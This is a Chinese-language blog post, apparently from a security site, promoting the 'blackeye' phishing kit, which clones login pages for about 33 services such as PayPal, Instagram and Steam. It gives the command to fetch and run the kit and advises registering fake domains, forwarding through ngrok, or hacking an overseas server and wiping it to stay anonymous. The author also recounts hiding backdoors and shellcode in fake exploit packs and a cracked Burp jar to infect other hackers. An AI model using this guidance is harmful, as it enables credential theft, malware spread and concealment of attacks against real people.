99%的人都不知道的秘密：世上竟有如此酷炫的釣魚系統！

釣魚作為從遠古時期出現的手段，到現在的風靡在各種成功的攻擊案例中幾乎成為一個高級hacker必不可少的技能。

高超的釣魚技巧取決於精心設計的社會工程學話術套路外，也必須配備一個優秀的釣魚系統才能保證攻擊的高效。一次成功的釣魚往往可以打開一個天衣無縫目標的突破口，從而深入地進行進一步滲透，以期達到持久化埋下伏筆……

在APT的世界中，0day攻擊似乎號稱核武器，但熟練的施行者往往知道0day的力量並不是那麼無堅不摧，也需要層層的信息刺探才能在關鍵環境讓一個漏洞利用發揮它應有的攻擊效果，而在這當中，針對人的攻擊往往無往而不利，最高超的攻擊人員往往在永恆的漏洞上面攻擊實踐會比其它花費更多的時間。

這裡指的永恆的漏洞可以意味人性的缺陷（心理戰）、釣魚、惡劣的習慣（弱口令/密碼通用），永遠存在的暴力破解、自身網路行為的痕迹、慾望想獲得的東西、平日的日常生活習慣、最喜歡的app應用等等等，問題本身的攻擊往往讓人捉摸不透也難以做到全面防禦，當然不同的人群不同的職業也有不同的手段。

舉個例子，黑客對漏洞武器的著迷往往可以利用，我對目標發布一個號稱最新的exploit利用pack包，裡面捆綁隱藏好我的後門（針對麻瓜不多說，但對專業的從業者、hacker、情報人員等等一定要做到免殺性！），他或許謹慎的會在虛擬機、沙箱、還原系統打開，但是如果我在這個偽造程序中構造的更複雜一些，讓他花費十分鐘看我的說明，再花費十分鐘做實驗，最後當他發現實驗失敗以後我也已經把我的工作做完了。尤甚幾年前我的一個idea，沒有人會在意jar、py的威脅，我經常把shellcode捆綁到一些原裝應用上，對方老是無往不利的幫我打開他們……

舉個簡單的例子，如果我號稱發布最新的破解版burp（其實只是在crack論壇下載了一個），然後我將jar木馬添加到burp中（這個利用程序某日會發在微博），你可以想像能獲得多少的「黑客資源」，因為幾乎所有強或弱的黑客們，在測試web的漏洞都會用到burp而且離不開他。或者我將一些利用程序的代碼添加在python中，人們往往一個git clone下載看也不看就開始嘗試這個小腳本的功能，更有甚者經常在本機的gui平台上運行他們，你可以想像我收穫了多少有用的東西，你認為殺毒防護軟體可以發現他們嗎？NO，當然不行，誰會去care一個jar和py呢？

當然這都是很久之前的經歷了，現在我做的技術分享都是安全向的，我想通過反向思維來變得更安全，我們可以從中養成一些好習慣。但是世界就是這麼有趣，或許我的電腦也被監視著，但我也不擔心，因為沒有什麼不能被看到的東西，我英俊的臉龐也被膠帶擋在了前置鏡頭前面，更重要的東西我都放在移動硬碟上並且設置好了加密。

好了言歸正傳……

今天的正餐《99%的人都不知道的秘密：世上竟有如此酷炫的釣魚系統！》，我相信你有了它肯定具備了成為高威脅人員的基礎條件了，萬丈高樓平地起，希望熱愛技術不幹壞事的你我他/她都越來越強。

先來放幾張預覽圖。

Instagram

Facebook

Snapchat

Twitter

Github

PayPal

Steam

它能做到幾乎33個項目的釣魚瞬間完成（詳細列表

點擊底部閱讀原文

重點是它可以自定義，在對企業內網滲透或者特定人員釣魚攻擊中不要太好用。

我隨便構造一個：

然後就可以創造一個自己需要的完全版克隆頁面：

例如

FreeBuf

Weibo

How to won?

git clone https://github.com/flagellantX/blackeye
./black.sh

如何攻擊外網（Forwarding）？

買空間註冊fake域名（可能不久以後會講如何獲得一些匿名的伺服器空間），簡單的想要調戲一下朋友無外乎ngrok轉發一下，或者黑一台海外伺服器，用後即毀，要成為一個拔迪奧無情的人才能足夠的stay in anon。

有教學視頻（Video）嗎？

這次比較水，只是這個釣魚構架有點好迫不及待的推出來了，字數不夠就乾貨來湊了。

最後的最後，我一直不會忘記新人們的boy/girl，安全行業的發展和未來一定是他們的，所以，如果你是個noob想成為hacker，漫天的找教程找書，甚至被fake被騙，求爺爺告奶奶的問大牛卻換來叫你去看厚厚的一卷TCP/IP協議或者一些你根本用不上看不懂的東西，可以點我修仙（

點擊底部閱讀原文

查看

*本文原創作者：flagellantX，本文屬FreeBuf原創獎勵計劃，未經許可禁止轉載

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！